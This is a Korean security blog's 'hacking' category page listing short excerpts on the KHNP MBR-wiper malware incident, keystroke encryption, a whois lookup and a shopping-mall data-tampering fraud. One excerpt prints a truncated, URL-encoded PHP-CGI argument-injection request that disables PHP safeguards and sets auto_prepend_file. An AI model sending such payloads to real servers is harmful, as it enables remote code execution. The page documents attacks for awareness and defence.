본문 바로가기

해킹191

728x90
한국수력원자력 MBR 파괴 악성코드 공격받아 최근 국내 주요 원전시설을 운영하는 한국수력원자력(이하 한수원)이 마스터 부트 레코드(이하 MBR)를 삭제하도록 설계된 악성코드에 감염되어 사회적 이슈가 되고 있습니다. 악성코드는 한글 워드 프로세서(HWP) 취약점을 통해 감염되었으며, 한수원 임직원들이 악성 첨부파일을 실행하도록 하기 위한 다양한 사회공학적 공격 기법이 사용되었습니다. 아래 그림과 같이 공격은 임직원들에게 전송된 스피어피싱 이메일에서부터 시작되었으며 첨부파일 실행시 2가지 악성코드를 설치하는 방식으로 진행되었습니다.MBR 파괴 공격의 감염 경로 악성코드에 대한 설명이 악성코드의 진단명은 TROJ_WHAIM.A이며, 감염된 시스템의 MBR을 파괴합니다. MBR 파괴 이외에도 감염된 시스템에서 특정 파일을 덮어쓰기 하는 기능과 감염된 시스.. 2014. 12. 27.
쉘코드 웹공격 사례 샘플 POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68.. 2014. 9. 4.
키보드 입력값을 암호화하는 기술 키보드 입력값을 암호화하는 기술 정보출처 IEEE Computer Magazine 원문언어 영어 출판날짜 2005년 10월 00일 국 가 미국 주제분야 컴퓨터 시스템 및 하드웨어, 운영체제(R12) BlueGem 시큐리티사는 최근 기존의 암호 시스템이 제공하지 못했던 키보드 입력 신호를 암호화하는 ''LocalSSL''이라는 암호화 시스템 기술을 개발했다고 밝혔다. 이 기술을 사용하면 해커들이 키로거(keylogger) 툴을 사용하여 사용자의 키보드 입력 값을 알아내는 해킹을 원천적으로 봉쇄할 수 있다. 기존의 암호화 기술은 주로 통신 시스템상의 송수신 데이터를 암호화하는 것으로 사용자의 키보드와 로컬 응용 사이의 키 입력 신호를 암호화 하지는 못했다. 키보드와 로컬 응용 사이에는 키로거 프로그램이 독립.. 2014. 5. 8.
웹사이트 침해시도 탐지코드 아이피 : 65.185.5.104organization:Class-Name:organizationorganization:ID:NETBLK-ISRR-65.185.0.0-17organization:Auth-Area:65.185.0.0/17organization:Org-Name:Road Runnerorganization:Tech-Contact:ipaddreg@rr.comorganization:Street-Address:13820 Sunrise Valley Driveorganization:City:Herndonorganization:State:VAorganization:Postal-Code:20171organization:Country-Code:USorganization:Phone:703-345-3151orga.. 2014. 3. 7.
지마켓 등 해킹.. 사이버머니 44억 훔쳐 인터넷쇼핑몰 보안 허점 이용 데이터 조작… 일당 5명 기소http://media.daum.net/society/others/newsview?newsid=20131214034709301 인터넷에서 무료로 구할 수 있는 웹 분석 프로그램을 이용해 데이터를 조작한 것 한 쇼핑몰의 경우 사이버머니를 인출할 때 요청 금액 데이터를 마이너스(-)로 조작하면 잔액이 오히려 늘어나는 허점 사이버머니 인출 시 마이너스값은 고려하지 않고 있었기 때문 출처 : 미디어다음 2013. 12. 16.
728x90
728x90

티스토리툴바